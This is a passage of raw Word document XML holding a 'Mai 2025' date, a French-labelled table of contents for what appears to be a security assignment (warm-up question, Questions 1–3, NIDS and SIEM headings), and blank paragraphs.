          <w:p w14:paraId="49A619C7" w14:textId="4F628607" w:rsidR="00E0117C" w:rsidRPr="00463422" w:rsidRDefault="00C201BB" w:rsidP="009D6C8B">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Mai</w:t>
            </w:r>
            <w:r w:rsidR="00E0117C" w:rsidRPr="00463422">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 202</w:t>
            </w:r>
            <w:r w:rsidR="003A76B8">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B49E650" w14:textId="5F4910D6" w:rsidR="002331ED" w:rsidRDefault="002331ED">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00124446">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table de matière</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc197502157" w:history="1">
        <w:r w:rsidRPr="00AB55D0">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Warm up question:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc197502157 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D154727" w14:textId="44733D0B" w:rsidR="002331ED" w:rsidRDefault="002331ED">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc197502158" w:history="1">
        <w:r w:rsidRPr="00AB55D0">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
            <w:noProof/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Question 1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc197502158 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="345796EF" w14:textId="29BB4CF9" w:rsidR="002331ED" w:rsidRDefault="002331ED">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc197502159" w:history="1">
        <w:r w:rsidRPr="00AB55D0">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
            <w:noProof/>
            <w:lang w:val="en-US" w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Question 2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc197502159 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F461ABB" w14:textId="3835FFE0" w:rsidR="002331ED" w:rsidRDefault="002331ED">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc197502160" w:history="1">
        <w:r w:rsidRPr="00AB55D0">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>NIDS – Network Intrusion Detection System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc197502160 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F7C2B7C" w14:textId="43908EBB" w:rsidR="002331ED" w:rsidRDefault="002331ED">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc197502161" w:history="1">
        <w:r w:rsidRPr="00AB55D0">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>SIEM – Security Information &amp; Event Management</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc197502161 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="399D0CB0" w14:textId="251C4AA5" w:rsidR="002331ED" w:rsidRDefault="002331ED">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc197502162" w:history="1">
        <w:r w:rsidRPr="00AB55D0">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Question 3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc197502162 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B3C31CD" w14:textId="58FC9134" w:rsidR="00DF0244" w:rsidRDefault="002331ED" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F978F2" w14:textId="77777777" w:rsidR="00DF0244" w:rsidRDefault="00DF0244" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C76DBF4" w14:textId="77777777" w:rsidR="00DF0244" w:rsidRDefault="00DF0244" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A896EF1" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6170072F" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579E106F" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42667591" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9AADB2" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53351B74" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232BF2DB" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E2398B" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CC15AC" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D03F28" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63220787" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10660C3D" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD74770" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FAD35A" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A65408" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E579BB3" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3203BD90" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC0631B" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5463D7EA" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A16E000" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABF0CAD" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="568F4D5D" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2337A41E" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F11B5D" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CBA08E9" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353E4C88" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D0BEFB" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0132359B" w14:textId="77777777" w:rsidR="00074E29" w:rsidRDefault="00074E29" w:rsidP="00DF0244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
